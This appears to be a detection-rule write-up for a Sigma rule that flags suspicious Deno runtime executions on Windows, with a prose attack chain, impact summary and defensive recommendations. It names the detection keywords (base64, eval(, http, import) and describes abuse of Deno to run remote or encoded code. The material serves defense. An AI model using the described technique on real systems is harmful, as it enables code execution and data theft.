Suspicious JavaScript Execution via Deno

This detection rule identifies suspicious JavaScript execution via the Deno runtime environment on Windows systems. Deno is a modern runtime for JavaScript and TypeScript that, while legitimate, can be abused by adversaries to execute malicious code. The rule focuses on command-line patterns indicative of malicious intent, specifically the presence of base64 encoding, the use of the eval() function, the inclusion of HTTP requests, or the use of JavaScript imports in a suspicious context. This activity is concerning because attackers can use Deno to bypass traditional security measures and execute arbitrary code for various malicious purposes, including staging further attacks or executing malware. The rule aims to detect these activities by monitoring process executions and analyzing their command lines.

Attack Chain

1. An attacker gains initial access to a Windows system (e.g., through social engineering, exploiting a vulnerability, or compromised credentials).
2. The attacker downloads or transfers the deno.exe executable to the compromised system. The executable might be renamed or placed in a non-standard location.
3. The attacker executes deno.exe with a command line containing suspicious elements such as base64, eval(, http, or import.
4. Deno interprets and executes the JavaScript code, which may be embedded directly in the command line (e.g., using eval()), fetched from a remote server (via http), or imported from a local file.
5. The JavaScript code performs malicious actions, such as downloading and executing additional payloads, establishing persistence, or exfiltrating data.
6. The malicious script may leverage Deno’s permissions to bypass security restrictions. Broad permissions (e.g., using the -A flag) are especially concerning.
7. The Deno process may spawn child processes to further the attacker’s objectives. These child processes may include command interpreters (e.g., cmd.exe, powershell.exe) or other utilities.
8. The ultimate objective is to achieve code execution, establish persistence, and/or compromise data.

Impact

Successful exploitation can lead to arbitrary code execution, allowing attackers to compromise the affected system. This could result in data theft, system disruption, or further propagation of malware within the network. The targeted systems could be developer workstations or build servers, leading to supply chain compromises. The impact of a successful attack is high due to the potential for significant damage and lateral movement within the environment.

Recommendation

• Deploy the Sigma rule “Suspicious JavaScript Execution via Deno” to your SIEM and tune for your environment to detect malicious Deno usage.
• Monitor process creation events for deno.exe execution, focusing on command lines containing base64, eval(, http, or import.
• Enable Sysmon process-creation logging to capture detailed command-line arguments for deno.exe.
• Investigate any alerts generated by the “Suspicious JavaScript Execution via Deno” Sigma rule, focusing on the process lineage, network connections, and file modifications associated with the Deno process.
• Restrict the usage of Deno to authorized users and systems (e.g., developers, build servers).
• Implement application control policies to prevent the execution of unauthorized or renamed copies of deno.exe.